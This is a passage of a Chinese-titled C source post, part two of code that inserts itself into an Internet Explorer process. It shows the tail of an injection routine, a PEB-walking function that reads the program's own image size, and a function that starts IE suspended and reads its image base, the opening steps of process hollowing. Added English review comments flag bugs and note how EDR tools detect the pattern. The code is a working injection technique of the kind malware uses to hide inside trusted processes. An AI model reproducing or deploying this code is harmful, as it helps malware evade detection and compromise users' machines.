把自身插入到IE进程里的代码(二)

read(pi.hThread);

}
else
{
printf("WirteMemory Failed,code:%d\r\n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}

}
else
{
printf("VirtualMemory Failed,code:%d\r\n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}

return TRUE;
}

/*
 * Returns the SizeOfImage of the first module in the current process's
 * in-load-order module list (normally the main executable) by walking
 * undocumented loader structures with hard-coded 32-bit offsets:
 *   fs:[0x30]    -> PEB
 *   PEB   + 0x0c -> PEB_LDR_DATA (Ldr)
 *   Ldr   + 0x0c -> InLoadOrderModuleList.Flink (first LDR_DATA_TABLE_ENTRY)
 *   entry + 0x20 -> SizeOfImage
 *
 * NOTE(review): hModule is never used. The result is always the first
 * list entry, not the module the caller passed in; the supported way to
 * obtain this value is the SizeOfImage field of the module's
 * IMAGE_OPTIONAL_HEADER, reachable from hModule.
 *
 * x86 / MSVC `_asm` only: the fs-segment PEB pointer and every offset
 * above are specific to the 32-bit layout and are not a stable contract
 * across Windows versions. Reading the PEB/Ldr list directly instead of
 * calling the loader API is a pattern worth flagging in review.
 */
DWORD GetSelfImageSize(HMODULE hModule)
{
DWORD dwImageSize;

_asm
{
mov ecx,0x30
mov eax, fs:[ecx]        // eax = PEB (fs:[0x30] on 32-bit Windows)
mov eax, [eax + 0x0c]    // eax = PEB->Ldr
mov esi, [eax + 0x0c]    // esi = Ldr->InLoadOrderModuleList.Flink (first entry)
add esi,0x20             // esi = &entry->SizeOfImage
lodsd                    // eax = entry->SizeOfImage
mov dwImageSize,eax

}

return dwImageSize;
}

/*
 * Starts the target program (szIePath, a global defined outside this
 * block) as a suspended child process and records its load base address.
 *
 * pi            - out: PROCESS_INFORMATION for the new process. The
 *                 hProcess/hThread handles in it are owned by the caller.
 * pThreadCxt    - out: CONTEXT of the suspended primary thread; this
 *                 function sets ContextFlags to CONTEXT_FULL before the
 *                 GetThreadContext call.
 * pChildProcess - out: dwBaseAddress receives the child's ImageBaseAddress
 *                 as read from the child's PEB.
 *
 * Returns TRUE when CreateProcess succeeded, FALSE otherwise.
 *
 * NOTE(review): the return values of GetThreadContext and
 * ReadProcessMemory are not checked, so TRUE may be returned while
 * pThreadCxt and pChildProcess->dwBaseAddress hold garbage. There is also
 * no failure path that terminates the suspended child or closes its
 * handles; the caller is responsible for both.
 *
 * NOTE(review): si.cb is left at 0; the documented CreateProcess contract
 * requires si.cb = sizeof(si).
 *
 * Detection note: CreateProcess(CREATE_SUSPENDED) followed by
 * GetThreadContext and a ReadProcessMemory of the child's PEB is the
 * opening sequence of process hollowing / thread-context injection and is
 * commonly surfaced by EDR telemetry on exactly this call pattern.
 */
BOOL CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
)

{
STARTUPINFO si = {0};

DWORD *PPEB;
DWORD read;

// Launch the target in suspended mode so its primary thread has not run yet.

if( CreateProcess(
NULL,
szIePath,
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
pi
) )
{
pThreadCxt->ContextFlags = CONTEXT_FULL;
GetThreadContext(pi->hThread, pThreadCxt);   // result unchecked (see header note)

// On 32-bit Windows the initial thread's EBX holds the address of the
// child's PEB at process start; x86-only assumption.
PPEB = (DWORD *)pThreadCxt->Ebx;

// Read the child's load base address: PEB + 8 (PPEB[2]) is
// ImageBaseAddress in the 32-bit PEB layout.
ReadProcessMemory(
pi->hProcess,
&PPEB[2],
(LPVOID)&(pChildProcess->dwBaseAddress),
sizeof(DWORD),
&read
);

return TRUE ;

}

return FALSE;
}